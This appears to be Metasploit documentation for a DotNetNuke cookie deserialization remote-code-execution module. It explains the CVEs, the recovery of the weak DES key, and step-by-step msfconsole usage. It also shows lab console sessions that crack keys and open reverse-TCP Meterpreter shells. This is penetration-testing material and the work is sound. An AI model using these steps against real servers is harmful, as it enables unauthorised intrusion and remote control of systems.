adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md
T
holdonasec b9c2ec60f5 Add DNN Cookie Deserialization RCE Exploit
2019-07-16 12:16:53 -04:00

19 KiB
Raw Blame History

This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.

The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data, which occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system.

DNN v5.0.0 - v9.1.0

CVE-2017-9822:

Directly exploitable.

DNN v9.1.1 - v9.2.1

CVE-2018-15811, CVE-2018-15812:

The patch for CVE-2017-9822 used a weak encryption algorithm (DES) and an encryption key of low entropy. Furthermore, if the target site is configured to use Verified Registration, the plaintext value of the registration verification code is exposed on the user profile page. Since the verification code is encrypted using the same algorithm and key as the DNNPersonalization cookie, a known-plaintext attack can be used to recover the key and re-exploit CVE-2017-9822 with an encrypted cookie. In some cases a valid .DOTNETNUKE session token may be required for exploitation (v9.2.0+)

DNN v9.2.2 - v9.3.0-RC

CVE-2018-18325, CVE-2018-18326:

The implemented patch for CVE-2018-15811 and CVE-2018-15812 did not prevent exploitation. The patch changed the encryption key used to encrypt and decrypt the DNNPersonalization cookie; however, this encryption key was still derived from the key used to encrypt and decrypt the registration verification code and the strength of the encryption algorithm was not increased (DES). Additional changes were made to prevent the full plaintext of the verification code from being disclosed. A partial plaintext value was still disclosed on the user profile page. Due to the project being open-source, it was possible to determine the format of the rest of the plaintext verification code. Using a list of obtained verification codes and the known partial plaintext value, it is possible to reduce the number of potential encryption keys through offline processing to a point where trying to re-exploit CVE-2017-9822 with each potential key becomes a feasible attack.

Vulnerable Application

On a Windows machine, download the "Install" package from here:

https://github.com/dnnsoftware/Dnn.Platform/releases/tag/v9.3.0-rc2

Install packages for other versions can be downloaded from:

https://github.com/dnnsoftware/Dnn.Platform/releases/tag/<version number>

Follow the installation instructions here for installing with ATTACHED DATABASE:

https://www.dnnsoftware.com/wiki/how-to-install-dotnetnuke

You will need SQL Server 2005/2008/2008R2/2012 or 2016 installed.

Log in as the super user account and make sure the 404 error page is set to the built-in 404 Error Page. Typically, this is already set as the default setting, but during testing I encountered an edge case where an issue during installation caused this value to be set to "None Specified".

Additionally, if you are testing this module from a machine other than the host that the application is installed on, you will need to configure the Site Alias so that it is accessible using a hostname other than localhost. Additional firewall rules may need to be configured to allow web access, depending on how you set up the applicaiton in IIS.

This module has been tested on DNN v7.0.0 - v9.3.0-RC running on Windows Server 2016.

v5.0.0 - v9.1.0

No additional configuration required.

v9.1.1+

While logged in as the super user account, configure the application to use Verified registration. You will also need to configure the SMTP server settings to be valid in order to receive the registration email.

Verification Steps

v5.0.0 - v9.1.0

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/http/dnn_cookie_deserialization_rce
  4. Do: set RHOST <RHOST>
  5. Do: set RPORT <RPORT>
  6. Do: set PAYLOAD windows/meterpreter/reverse_tcp
  7. Do: set LHOST <LHOST>
  8. Do: set LPORT <LPORT>
  9. Do: check
  10. Verify that you are seeing The target appears to be vulnerable in the console
  11. Do: exploit
  12. Verify that you get a meterpeter shell

v9.1.1

  1. Install the application
  2. Configure the application to use Verified Registration
  3. Configure the application's SMTP server settings so that it will send the registration email
  4. Register a new user account and copy the verification code in the link in the registration email
  5. Log in as the new user and navigate to the Edit Profile page. Note the userId url path parameter value
  6. Examine the page's source code and search for a portalId value that is a positive integer.
  7. Start msfconsole
  8. Do: use exploit/windows/http/dnn_cookie_deserialization_rce
  9. Do: set RHOST <RHOST>
  10. Do: set RPORT <RPORT>
  11. Do: set PAYLOAD windows/meterpreter/reverse_tcp
  12. Do: set LHOST <LHOST>
  13. Do: set LPORT <LPORT>
  14. Do: set VERIFICATION_CODE <Verification Code>
  15. Do: set VERIFICATION_PLAIN <{portalId}-{userId}>
  16. Do: set ENCRYPTED true
  17. Do: check
  18. Verify that you are seeing The target appears to be vulnerable in the console
  19. Do: exploit
  20. Verify that you get a meterpeter shell

v9.2.0 - v9.2.1

  1. Install the application
  2. Configure the application to use Verified Registration
  3. Configure the application's SMTP server settings so that it will send the registration email
  4. Register a new user account and copy the verification code in the link in the registration email
  5. Log in as the new user and navigate to the Edit Profile page. Note the userId url path parameter value
  6. Examine the Edit Profile page's source code and search for a portalId value that is a positive integer.
  7. While logged in, examine your cookies using the browser's developer tools or by other means. Copy the value of the .DOTNETNUKE cookie value.
  8. Start msfconsole
  9. Do: use exploit/windows/http/dnn_cookie_deserialization_rce
  10. Do: set RHOST <RHOST>
  11. Do: set RPORT <RPORT>
  12. Do: set PAYLOAD windows/meterpreter/reverse_tcp
  13. Do: set LHOST <LHOST>
  14. Do: set LPORT <LPORT>
  15. Do: set VERIFICATION_CODE <Verification Code>
  16. Do: set VERIFICATION_PLAIN <{portalId}-{userId}>
  17. Do: set ENCRYPTED true
  18. Do: set SESSION_TOKEN <.DOTNETNUKE cookie value>
  19. Do: check
  20. Verify that you are seeing The target appears to be vulnerable in the console
  21. Do: exploit
  22. Verify that you get a meterpeter shell

v9.2.2 - 9.3.0-RC

In these versions, the userId value was changed to be a randomly generated GUID. This means that only the first part of the verification plaintext is known. By providing a list of several verification codes, it is possible to reduce the nubmer of potential encryption key values to a feasible amount. Once the list of encryption keys has been reduced, the module will test each key until an HTTP callback is received on port 8080 that indicates which key worked. Then, the final exploit payload will be encrypted using the recovered key and sent to the server, resulting in a shell.

  1. Install the application
  2. Configure the application to use Verified Registration
  3. Configure the application's SMTP server settings so that it will send the registration email
  4. Register several new user accounts and note the verification codes in the link in the registration emails
  5. Log in as the new user and navigate to the Edit Profile page.
  6. Examine the Edit Profile page's source code and search for a portalId value that is a positive integer
  7. While logged in, examine your cookies using the browser's developer tools or by other means. Copy the value of the .DOTNETNUKE cookie value.
  8. Start msfconsole
  9. Do: use exploit/windows/http/dnn_cookie_deserialization_rce
  10. Do: set RHOST <RHOST>
  11. Do: set RPORT <RPORT>
  12. Do: set PAYLOAD windows/meterpreter/reverse_tcp
  13. Do: set LHOST <LHOST>
  14. Do: set LPORT <LPORT>
  15. Do: set VERIFICATION_CODE <full path to file containing verification codes>
  16. Do: set VERIFICATION_PLAIN <{portalId}->
  17. Do: set ENCRYPTED true
  18. Do: set SESSION_TOKEN <.DOTNETNUKE cookie value>
  19. Do: set TARGET 4
  20. Do: check
  21. Verify that you are seeing The target appears to be vulnerable in the console.
  22. Do: exploit
  23. Verify that you get a meterpeter shell

Options

DryRun

Set this to true to generate a payload, but not send the exploit to the target server. Default value is false.

ENCRYPTED

Set this to true for targets running v9.1.1+. Default value is false.

IV

The initialization vector to use for encrypting the payload. If specified along with KEY, VERIFICATION_CODE and VERIFICATION_PLAIN options will be ignored.

KEY

The key to use for encryption. If specified along with IV, VERIFICATION_CODE and VERIFICATION_PLAIN options will be ignored.

SESSION_TOKEN

The .DOTNETNUKE session cookie value to use when submitting the payload to the server. Required for targets running v9.2.0+.

SRVPORT

The server port to listen for HTTP callbacks on when testing encryption passphrases for targets running v9.2.2 - v9.3.0-RC. Default value is 8080

TARGETURI

Path to a page that will result in a DNN 404 Error Page. The default location is /__

VERIFICATION_CODE

The verification code received in an email, or the full path to a file containing multiple verification codes.

VERIFICATION_PLAIN

The known (full or partial) plaintext of the encrypted verification code. Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer (v9.1.1 - v9.2.1) or GUID (v9.2.2+).

Scenarios

v5.1.0 - v9.1.0

Here's showing the expected output:

msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8083
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

[*] Trying to determine DNN Version...
[*] Checking version at /Documentation/License.txt ...
[+] DNN Version Found: v5.1.0 - v9.0.1
[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[*] 192.168.31.131:8083 - The target appears to be vulnerable.
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[*] Started reverse TCP handler on 192.168.31.128:443 
[*] Sending Exploit Payload to: /__ ...
[*] Sending stage (179779 bytes) to 192.168.31.131
[*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49957) at 2019-07-10 14:02:09 -0400

meterpreter > sysinfo
Computer        : SERVER_NAME
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

v9.1.1

Here's showing the expected output

msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8084
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE Amop-0Et1fM_
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-2
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

[*] Trying to determine DNN Version...
[*] Checking version at /Documentation/License.txt ...
[!] DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED
[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[*] 192.168.31.131:8084 - The target appears to be vulnerable.
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[*] Finding Key...
[*] Searching at 648742.110 keys/s ...... 68.69% of keyspace complete.
[+] KEY Found: B2ABB4BB
[+] IV Found: 11A4D8BE
[*] Total number of Keys tried: 29568463
[*] Time to crack: 45.578 seconds
[*] Started reverse TCP handler on 192.168.31.128:443 
[*] Sending Exploit Payload to: /__ ...
[*] Sending stage (179779 bytes) to 192.168.31.131
[*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49970) at 2019-07-10 14:46:38 -0400

meterpreter > sysinfo
Computer        : SERVER_NAME
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

v9.2.0 - v9.2.1

Here's the expected output:

msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8085
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE xR9oL8FP2eE_
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-3
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 20FED393A44F86138D9089074C819880222A494155CEFAC6FEAF2B3B5204A227625654D87EA48ECB1E509664A7E8E32644BD363D3E6FD3A3273B245EF2D10B5E13D7912B
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

[*] Trying to determine DNN Version...
[*] Checking version at /Documentation/License.txt ...
[!] DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2 - try setting target 4 and supply a file of of verification codes, or specifiy valid Key and IV values.
[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[+] 192.168.31.131:8085 - The target appears to be vulnerable.
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[*] Finding Key...
[*] Searching at 641992.579 keys/s ...... 1.47% of keyspace complete.
[+] KEY Found: 022BA242
[+] IV Found: 0BCF9976
[*] Total number of Keys tried: 633602
[*] Time to crack: 0.987 seconds
[*] Started reverse TCP handler on 192.168.31.128:443 
[*] Sending Exploit Payload to: /__ ...
[*] Sending stage (179779 bytes) to 192.168.31.131
[*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49971) at 2019-07-10 15:08:04 -0400

meterpreter > sysinfo
Computer        : SERVER_NAME
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

v9.2.2 - v9.3.0-RC

Here's the expected output:

msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce 
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8090
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE /dnn930rc_verification_codes.txt
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 306A9A382E32E420739C589CCD5C44A7C2595A7163D3340DF4AD71D4223AFC6866E823F36C6171F84FD7352E6BEB17D66B9823567557988321A0867C7038FF6B0F5B0C1F943CBBDAC0B2EE3E
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set TARGET 4
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check

[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[+] 192.168.31.131:8090 - The target is vulnerable.
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit

[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[*] Finding Key...
[*] Searching at 420798.449 keys/s ...... 15.24% of keyspace complete.
[+] Possible Base Key Value Found: 2660A22D
[*] Total number of Keys tried: 6558182
[*] Time to crack: 15.585 seconds
[*] Generated 128 possible base KEY values from 2660A22D
[!] Finding possible base IVs. This may take a few minutes...
[*] Found 4 potential Base IV values using 10 verification codes in 42.82 seconds.
[*] Generated 512 possible base64 KEY and IV combinations.
[!] Trying all possible KEY and IV combinations...
[*] Starting HTTP listener on port 8080...
[*] Using URL: http://192.168.31.128:8080/fCyQGz78
[!] Sending 512 test Payload(s) to: /__. This may take a few minutes ...
[*] Trying KEY and IV combination 440 of 512...
[+] KEY: ByEypXIT and IV: zhKad5QC found
[*] Started reverse TCP handler on 192.168.31.128:443 
[*] Sending Exploit Payload to: /__ ...
[*] Sending stage (179779 bytes) to 192.168.31.131
[*] Meterpreter session 1 opened (192.168.31.128:443 -> 192.168.31.131:49973) at 2019-07-10 15:39:12 -0400

meterpreter > sysinfo
Computer        : SERVER_NAME
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
Reference in New Issue View Git Blame Copy Permalink